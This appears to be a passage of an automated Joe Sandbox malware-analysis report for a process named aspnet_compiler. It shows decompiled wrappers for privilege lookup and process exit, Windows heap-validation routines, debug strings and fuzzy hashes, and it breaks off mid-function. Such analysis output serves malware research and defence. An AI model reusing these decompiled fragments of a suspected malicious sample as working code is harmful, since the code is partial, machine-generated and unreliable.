                          0x00418938
                          0x0041893a
                          0x0041893c
                          0x0041893d
                          0x00418940
                          0x00418943
                          0x0041895a
                          0x00418968

                          APIs
                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                          Memory Dump Source
                          • Source File: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID:
                          • API String ID: 621844428-0
                          • Opcode ID: a21fcbd67dab7e277fcafdfd7e2107503f0a91098bfa6bc0a75d31bc76cf5230
                          • Instruction ID: 02a4b00d6649fdc3fe5e3b352ff5edbb3c25a682541a6bec4262614e7a40c123
                          • Opcode Fuzzy Hash: a21fcbd67dab7e277fcafdfd7e2107503f0a91098bfa6bc0a75d31bc76cf5230
                          • Instruction Fuzzy Hash: 1FE08671110308BFD3249F58CC85ED737ACAF49750F114459FA589B641DB31A940C6E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 260 418a60-418a79 261 418a7f-418a94 LookupPrivilegeValueW 260->261 262 418a7a call 4191f0 260->262 262->261
                          C-Code - Quality: 100%
                          			E00418A60(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                          				int _t10;
                          				void* _t15;
                          
                          				E004191F0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                          				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                          				return _t10;
                          			}





                          0x00418a7a
                          0x00418a90
                          0x00418a94

                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                          Memory Dump Source
                          • Source File: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                          Yara matches
                          Similarity
                          • API ID: LookupPrivilegeValue
                          • String ID:
                          • API String ID: 3899507212-0
                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                          • Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                          • Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00418940(intOrPtr _a4, int _a8) {
                          				void* _t10;
                          
                          				_t5 = _a4;
                          				E004191F0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                          				ExitProcess(_a8);
                          			}




                          0x00418943
                          0x0041895a
                          0x00418968

                          APIs
                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                          Memory Dump Source
                          • Source File: 00000007.00000002.356484497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID:
                          • API String ID: 621844428-0
                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                          • Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                          • Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: dd0cb9ff169640ca7669cc242ecdf015d4e57fb9a150917db41a03b84e8283b2
                          • Instruction ID: c4a5c7a46777d4f9b6b0a3e630eea435ca492c93f056e880eef2ddc811e915ca
                          • Opcode Fuzzy Hash: dd0cb9ff169640ca7669cc242ecdf015d4e57fb9a150917db41a03b84e8283b2
                          • Instruction Fuzzy Hash: B3B09B71D064C5C6F611D7A44608717790477D4745F16C053D1060692B4778C091F5B5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          • The resource is owned exclusively by thread %p, xrefs: 014AB374
                          • The resource is owned shared by %d threads, xrefs: 014AB37E
                          • *** Inpage error in %ws:%s, xrefs: 014AB418
                          • write to, xrefs: 014AB4A6
                          • an invalid address, %p, xrefs: 014AB4CF
                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 014AB3D6
                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 014AB484
                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 014AB2F3
                          • Go determine why that thread has not released the critical section., xrefs: 014AB3C5
                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 014AB2DC
                          • The instruction at %p tried to %s , xrefs: 014AB4B6
                          • The instruction at %p referenced memory at %p., xrefs: 014AB432
                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 014AB305
                          • *** then kb to get the faulting stack, xrefs: 014AB51C
                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 014AB476
                          • a NULL pointer, xrefs: 014AB4E0
                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 014AB53F
                          • read from, xrefs: 014AB4AD, 014AB4B2
                          • *** enter .cxr %p for the context, xrefs: 014AB50D
                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 014AB47D
                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 014AB38F
                          • The critical section is owned by thread %p., xrefs: 014AB3B9
                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 014AB314
                          • This failed because of error %Ix., xrefs: 014AB446
                          • *** Resource timeout (%p) in %ws:%s, xrefs: 014AB352
                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 014AB323
                          • *** An Access Violation occurred in %ws:%s, xrefs: 014AB48F
                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 014AB39B
                          • <unknown>, xrefs: 014AB27E, 014AB2D1, 014AB350, 014AB399, 014AB417, 014AB48E
                          • *** enter .exr %p for the exception record, xrefs: 014AB4F1
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                          • API String ID: 0-108210295
                          • Opcode ID: ea944c781b244ba2d8580e41b67c9cfba35b85ddbc60b57032883da5c9448dc2
                          • Instruction ID: 17a82652392b88a07e45d6ff40982f3051a3c18d97aedcda8dd4cb9375af480c
                          • Opcode Fuzzy Hash: ea944c781b244ba2d8580e41b67c9cfba35b85ddbc60b57032883da5c9448dc2
                          • Instruction Fuzzy Hash: A1813131A00220FFDB21BA4A9C49D6F3B66EF76A59F82405AF5052F372D3718452C7A2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 44%
                          			E014B1C06() {
                          				signed int _t27;
                          				char* _t104;
                          				char* _t105;
                          				intOrPtr _t113;
                          				intOrPtr _t115;
                          				intOrPtr _t117;
                          				intOrPtr _t119;
                          				intOrPtr _t120;
                          
                          				_t105 = 0x13d48a4;
                          				_t104 = "HEAP: ";
                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                          					_push(_t104);
                          					E013FB150();
                          				} else {
                          					E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          				}
                          				_push( *0x14e589c);
                          				E013FB150("Heap error detected at %p (heap handle %p)\n",  *0x14e58a0);
                          				_t27 =  *0x14e5898; // 0x0
                          				if(_t27 <= 0xf) {
                          					switch( *((intOrPtr*)(_t27 * 4 +  &M014B1E96))) {
                          						case 0:
                          							_t105 = "heap_failure_internal";
                          							goto L21;
                          						case 1:
                          							goto L21;
                          						case 2:
                          							goto L21;
                          						case 3:
                          							goto L21;
                          						case 4:
                          							goto L21;
                          						case 5:
                          							goto L21;
                          						case 6:
                          							goto L21;
                          						case 7:
                          							goto L21;
                          						case 8:
                          							goto L21;
                          						case 9:
                          							goto L21;
                          						case 0xa:
                          							goto L21;
                          						case 0xb:
                          							goto L21;
                          						case 0xc:
                          							goto L21;
                          						case 0xd:
                          							goto L21;
                          						case 0xe:
                          							goto L21;
                          						case 0xf:
                          							goto L21;
                          					}
                          				}
                          				L21:
                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                          					_push(_t104);
                          					E013FB150();
                          				} else {
                          					E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          				}
                          				_push(_t105);
                          				E013FB150("Error code: %d - %s\n",  *0x14e5898);
                          				_t113 =  *0x14e58a4; // 0x0
                          				if(_t113 != 0) {
                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                          						_push(_t104);
                          						E013FB150();
                          					} else {
                          						E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          					}
                          					E013FB150("Parameter1: %p\n",  *0x14e58a4);
                          				}
                          				_t115 =  *0x14e58a8; // 0x0
                          				if(_t115 != 0) {
                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                          						_push(_t104);
                          						E013FB150();
                          					} else {
                          						E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          					}
                          					E013FB150("Parameter2: %p\n",  *0x14e58a8);
                          				}
                          				_t117 =  *0x14e58ac; // 0x0
                          				if(_t117 != 0) {
                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                          						_push(_t104);
                          						E013FB150();
                          					} else {
                          						E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          					}
                          					E013FB150("Parameter3: %p\n",  *0x14e58ac);
                          				}
                          				_t119 =  *0x14e58b0; // 0x0
                          				if(_t119 != 0) {
                          					L41:
                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                          						_push(_t104);
                          						E013FB150();
                          					} else {
                          						E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          					}
                          					_push( *0x14e58b4);
                          					E013FB150("Last known valid blocks: before - %p, after - %p\n",  *0x14e58b0);
                          				} else {
                          					_t120 =  *0x14e58b4; // 0x0
                          					if(_t120 != 0) {
                          						goto L41;
                          					}
                          				}
                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                          					_push(_t104);
                          					E013FB150();
                          				} else {
                          					E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          				}
                          				return E013FB150("Stack trace available at %p\n", 0x14e58c0);
                          			}











                          0x014b1c10
                          0x014b1c16
                          0x014b1c1e
                          0x014b1c3d
                          0x014b1c3e
                          0x014b1c20
                          0x014b1c35
                          0x014b1c3a
                          0x014b1c44
                          0x014b1c55
                          0x014b1c5a
                          0x014b1c65
                          0x014b1c67
                          0x00000000
                          0x014b1c6e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014b1c67
                          0x014b1cdc
                          0x014b1ce5
                          0x014b1d04
                          0x014b1d05
                          0x014b1ce7
                          0x014b1cfc
                          0x014b1d01
                          0x014b1d0b
                          0x014b1d17
                          0x014b1d1f
                          0x014b1d25
                          0x014b1d30
                          0x014b1d4f
                          0x014b1d50
                          0x014b1d32
                          0x014b1d47
                          0x014b1d4c
                          0x014b1d61
                          0x014b1d67
                          0x014b1d68
                          0x014b1d6e
                          0x014b1d79
                          0x014b1d98
                          0x014b1d99
                          0x014b1d7b
                          0x014b1d90
                          0x014b1d95
                          0x014b1daa
                          0x014b1db0
                          0x014b1db1
                          0x014b1db7
                          0x014b1dc2
                          0x014b1de1
                          0x014b1de2
                          0x014b1dc4
                          0x014b1dd9
                          0x014b1dde
                          0x014b1df3
                          0x014b1df9
                          0x014b1dfa
                          0x014b1e00
                          0x014b1e0a
                          0x014b1e13
                          0x014b1e32
                          0x014b1e33
                          0x014b1e15
                          0x014b1e2a
                          0x014b1e2f
                          0x014b1e39
                          0x014b1e4a
                          0x014b1e02
                          0x014b1e02
                          0x014b1e08
                          0x00000000
                          0x00000000
                          0x014b1e08
                          0x014b1e5b
                          0x014b1e7a
                          0x014b1e7b
                          0x014b1e5d
                          0x014b1e72
                          0x014b1e77
                          0x014b1e95

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                          • API String ID: 0-2897834094
                          • Opcode ID: 596037d0aa7ba5ee19fe10b1601ac91ffe10ffae98b8ecf31a584640c1a5e45e
                          • Instruction ID: 2273f4f6ee1a6fe9959c5ff5664de908ab014587708f7260ea970c531b493577
                          • Opcode Fuzzy Hash: 596037d0aa7ba5ee19fe10b1601ac91ffe10ffae98b8ecf31a584640c1a5e45e
                          • Instruction Fuzzy Hash: B561C37B510255DFD321AB89F4D9E61B3E8EB04D38B09803FF5096F366D63498429F2A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 59%
                          			E014B4AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
                          				signed int _v6;
                          				signed int _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t189;
                          				intOrPtr _t191;
                          				intOrPtr _t210;
                          				signed int _t225;
                          				signed char _t231;
                          				intOrPtr _t232;
                          				unsigned int _t245;
                          				intOrPtr _t249;
                          				intOrPtr _t259;
                          				signed int _t281;
                          				signed int _t283;
                          				intOrPtr _t284;
                          				signed int _t288;
                          				signed int* _t294;
                          				signed int* _t298;
                          				intOrPtr* _t299;
                          				intOrPtr* _t300;
                          				signed int _t307;
                          				signed int _t309;
                          				signed short _t312;
                          				signed short _t315;
                          				signed int _t317;
                          				signed int _t320;
                          				signed int _t322;
                          				signed int _t326;
                          				signed int _t327;
                          				void* _t328;
                          				signed int _t332;
                          				signed int _t340;
                          				signed int _t342;
                          				signed char _t344;
                          				signed int* _t345;
                          				void* _t346;
                          				signed char _t352;
                          				signed char _t367;
                          				signed int _t374;
                          				intOrPtr* _t378;
                          				signed int _t380;
                          				signed int _t385;
                          				signed char _t390;
                          				unsigned int _t392;
                          				signed char _t395;
                          				unsigned int _t397;
                          				intOrPtr* _t400;
                          				signed int _t402;
                          				signed int _t405;
                          				intOrPtr* _t406;
                          				signed int _t407;
                          				intOrPtr _t412;
                          				void* _t414;
                          				signed int _t415;
                          				signed int _t416;
                          				signed int _t429;
                          
                          				_v16 = _v16 & 0x00000000;
                          				_t189 = 0;
                          				_v8 = _v8 & 0;
                          				_t332 = __edx;
                          				_v12 = 0;
                          				_t414 = __ecx;
                          				_t415 = __edx;
                          				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
                          					L88:
                          					_t416 = _v16;
                          					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
                          						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
                          						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
                          							L107:
                          							return 1;
                          						}
                          						_t191 =  *[fs:0x30];
                          						__eflags =  *(_t191 + 0xc);
                          						if( *(_t191 + 0xc) == 0) {
                          							_push("HEAP: ");
                          							E013FB150();
                          						} else {
                          							E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          						}
                          						_push(_v12);
                          						_push( *((intOrPtr*)(_t332 + 0x30)));
                          						_push(_t332);
                          						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
                          						L122:
                          						E013FB150();
                          						L119:
                          						return 0;
                          					}
                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                          						_push("HEAP: ");
                          						E013FB150();
                          					} else {
                          						E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          					}
                          					_push(_t416);
                          					_push( *((intOrPtr*)(_t332 + 0x2c)));
                          					_push(_t332);
                          					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
                          					goto L122;
                          				} else {
                          					goto L1;
                          				}
                          				do {
                          					L1:
                          					 *_a16 = _t415;
                          					if( *(_t414 + 0x4c) != 0) {
                          						_t392 =  *(_t414 + 0x50) ^  *_t415;
                          						 *_t415 = _t392;
                          						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
                          						_t424 = _t392 >> 0x18 - _t352;
                          						if(_t392 >> 0x18 != _t352) {
                          							_push(_t352);
                          							E014AFA2B(_t332, _t414, _t415, _t414, _t415, _t424);
                          						}
                          					}
                          					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
                          						_t210 =  *[fs:0x30];
                          						__eflags =  *(_t210 + 0xc);
                          						if( *(_t210 + 0xc) == 0) {
                          							_push("HEAP: ");
                          							E013FB150();
                          						} else {
                          							E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          						}
                          						_push(_v8 & 0x0000ffff);
                          						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
                          						__eflags = _t340;
                          						_push(_t340);
                          						E013FB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
                          						L117:
                          						__eflags =  *(_t414 + 0x4c);
                          						if( *(_t414 + 0x4c) != 0) {
                          							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                          							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                          							__eflags =  *_t415;
                          						}
                          						goto L119;
                          					}
                          					_t225 =  *_t415 & 0x0000ffff;
                          					_t390 =  *(_t415 + 2);
                          					_t342 = _t225;
                          					_v8 = _t342;
                          					_v20 = _t342;
                          					_v28 = _t225 << 3;
                          					if((_t390 & 0x00000001) == 0) {
                          						__eflags =  *(_t414 + 0x40) & 0x00000040;
                          						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
                          						__eflags = _t344 & 0x00000001;
                          						if((_t344 & 0x00000001) == 0) {
                          							L66:
                          							_t345 = _a12;
                          							 *_a8 =  *_a8 + 1;
                          							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
                          							__eflags =  *_t345;
                          							L67:
                          							_t231 =  *(_t415 + 6);
                          							if(_t231 == 0) {
                          								_t346 = _t414;
                          							} else {
                          								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
                          							}
                          							if(_t346 != _t332) {
                          								_t232 =  *[fs:0x30];
                          								__eflags =  *(_t232 + 0xc);
                          								if( *(_t232 + 0xc) == 0) {
                          									_push("HEAP: ");
                          									E013FB150();
                          								} else {
                          									E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          								}
                          								_push( *(_t415 + 6) & 0x000000ff);
                          								_push(_t415);
                          								_push("Heap block at %p has incorrect segment offset (%x)\n");
                          								goto L95;
                          							} else {
                          								if( *((char*)(_t415 + 7)) != 3) {
                          									__eflags =  *(_t414 + 0x4c);
                          									if( *(_t414 + 0x4c) != 0) {
                          										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                          										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                          										__eflags =  *_t415;
                          									}
                          									_t415 = _t415 + _v28;
                          									__eflags = _t415;
                          									goto L86;
                          								}
                          								_t245 =  *(_t415 + 0x1c);
                          								if(_t245 == 0) {
                          									_t395 =  *_t415 & 0x0000ffff;
                          									_v6 = _t395 >> 8;
                          									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
                          									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
                          										__eflags =  *(_t414 + 0x4c);
                          										if( *(_t414 + 0x4c) != 0) {
                          											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
                          											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                          											__eflags =  *_t415;
                          										}
                          										goto L107;
                          									}
                          									_t249 =  *[fs:0x30];
                          									__eflags =  *(_t249 + 0xc);
                          									if( *(_t249 + 0xc) == 0) {
                          										_push("HEAP: ");
                          										E013FB150();
                          									} else {
                          										E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          									}
                          									_push( *((intOrPtr*)(_t332 + 0x28)));
                          									_push(_t415);
                          									_push("Heap block at %p is not last block in segment (%p)\n");
                          									L95:
                          									E013FB150();
                          									goto L117;
                          								}
                          								_v12 = _v12 + 1;
                          								_v16 = _v16 + (_t245 >> 0xc);
                          								if( *(_t414 + 0x4c) != 0) {
                          									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                          									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                          								}
                          								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
                          								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
                          									L82:
                          									_v8 = _v8 & 0x00000000;
                          									goto L86;
                          								} else {
                          									if( *(_t414 + 0x4c) != 0) {
                          										_t397 =  *(_t414 + 0x50) ^  *_t415;
                          										 *_t415 = _t397;
                          										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
                          										_t442 = _t397 >> 0x18 - _t367;
                          										if(_t397 >> 0x18 != _t367) {
                          											_push(_t367);
                          											E014AFA2B(_t332, _t414, _t415, _t414, _t415, _t442);
                          										}
                          									}
                          									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
                          										_t259 =  *[fs:0x30];
                          										__eflags =  *(_t259 + 0xc);
                          										if( *(_t259 + 0xc) == 0) {
                          											_push("HEAP: ");
                          											E013FB150();
                          										} else {
                          											E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          										}
                          										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
                          										_push(_t415);
                          										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
                          										goto L95;
                          									} else {
                          										if( *(_t414 + 0x4c) != 0) {
                          											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                          											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                          										}
                          										goto L82;
                          									}
                          								}
                          							}
                          						}
                          						_t281 = _v28 + 0xfffffff0;
                          						_v24 = _t281;
                          						__eflags = _t390 & 0x00000002;
                          						if((_t390 & 0x00000002) != 0) {
                          							__eflags = _t281 - 4;
                          							if(_t281 > 4) {
                          								_t281 = _t281 - 4;
                          								__eflags = _t281;
                          								_v24 = _t281;
                          							}
                          						}
                          						__eflags = _t390 & 0x00000008;
                          						if((_t390 & 0x00000008) == 0) {
                          							_t102 = _t415 + 0x10; // -8
                          							_t283 = E0144D540(_t102, _t281, 0xfeeefeee);
                          							_v20 = _t283;
                          							__eflags = _t283 - _v24;
                          							if(_t283 != _v24) {
                          								_t284 =  *[fs:0x30];
                          								__eflags =  *(_t284 + 0xc);
                          								if( *(_t284 + 0xc) == 0) {
                          									_push("HEAP: ");
                          									E013FB150();
                          								} else {
                          									E013FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                          								}
                          								_t288 = _v20 + 8 + _t415;
                          								__eflags = _t288;
                          								_push(_t288);
                          								_push(_t415);
                          								_push("Free Heap block %p modified at %p after it was freed\n");
                          								goto L95;
                          							}
                          							goto L66;
                          						} else {
                          							_t374 =  *(_t415 + 8);
                          							_t400 =  *((intOrPtr*)(_t415 + 0xc));
                          							_v24 = _t374;
                          							_v28 = _t400;
                          							_t294 =  *(_t374 + 4);
                          							__eflags =  *_t400 - _t294;
                          							if( *_t400 != _t294) {
                          								L64:
                          								_push(_t374);
                          								_push( *_t400);
                          								_t101 = _t415 + 8; // -16
                          								E014BA80D(_t414, 0xd, _t101, _t294);
                          								goto L86;
                          							}
                          							_t56 = _t415 + 8; // -16
                          							__eflags =  *_t400 - _t56;
                          							_t374 = _v24;
                          							if( *_t400 != _t56) {
                          								goto L64;
                          							}
                          							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
                          							_t402 =  *(_t414 + 0xb4);
                          							__eflags = _t402;
                          							if(_t402 == 0) {
                          								L35:
                          								_t298 = _v28;
                          								 *_t298 = _t374;
                          								 *(_t374 + 4) = _t298;
                          								__eflags =  *(_t415 + 2) & 0x00000008;
                          								if(( *(_t415 + 2) & 0x00000008) == 0) {
                          									L39:
                          									_t377 =  *_t415 & 0x0000ffff;
                          									_t299 = _t414 + 0xc0;
                          									_v28 =  *_t415 & 0x0000ffff;
                          									 *(_t415 + 2) = 0;
                          									 *((char*)(_t415 + 7)) = 0;
                          									__eflags =  *(_t414 + 0xb4);
                          									if( *(_t414 + 0xb4) == 0) {
                          										_t378 =  *_t299;
                          									} else {
                          										_t378 = E0141E12C(_t414, _t377);
                          										_t299 = _t414 + 0xc0;
                          									}
                          									__eflags = _t299 - _t378;
                          									if(_t299 == _t378) {
                          										L51:
                          										_t300 =  *((intOrPtr*)(_t378 + 4));
                          										__eflags =  *_t300 - _t378;
                          										if( *_t300 != _t378) {
                          											_push(_t378);
